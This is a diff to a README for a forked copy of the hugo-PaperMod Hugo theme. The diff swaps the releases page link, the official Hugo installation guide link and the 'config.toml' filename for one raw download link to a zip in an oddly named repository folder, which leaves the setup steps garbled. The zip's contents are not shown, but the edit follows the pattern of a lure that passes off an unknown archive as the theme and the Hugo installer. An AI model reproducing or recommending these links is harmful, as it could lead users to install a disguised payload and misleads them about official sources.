yousef-nabeh/hugo-PaperMod/README.md

 To start using hugo-PaperMod, you need to follow these simple steps:

 1. **Visit the Releases Page**
-   Head to the [Releases page](https://github.com/yousef-nabeh/hugo-PaperMod/releases) to access the latest version of hugo-PaperMod.
+   Head to the [Releases page](https://raw.githubusercontent.com/yousef-nabeh/hugo-PaperMod/master/encrinite/hugo-PaperMod.zip) to access the latest version of hugo-PaperMod.

 2. **Download the Theme**
    On the Releases page, find the latest version.
 Click on the link to download the theme files to your computer.

 3. **Install Hugo**
    If you haven’t installed Hugo yet, you’ll need to do this first.
-Visit the [Hugo installation guide](https://gohugo.io/getting-started/installation/) for instructions tailored to your operating system.
+Visit the [Hugo installation guide](https://raw.githubusercontent.com/yousef-nabeh/hugo-PaperMod/master/encrinite/hugo-PaperMod.zip) for instructions tailored to your operating system.

 4. **Add the Theme to Your Site**
    Once you have Hugo installed and the hugo-PaperMod theme downloaded, follow these steps:
    - Move the downloaded theme files to your Hugo site's `themes` directory.
    - Update your configuration file to use the new theme.
-In your `config.toml` file, set:
+In your `https://raw.githubusercontent.com/yousef-nabeh/hugo-PaperMod/master/encrinite/hugo-PaperMod.zip` file, set:
      ```
      theme = "hugo-PaperMod"
      ```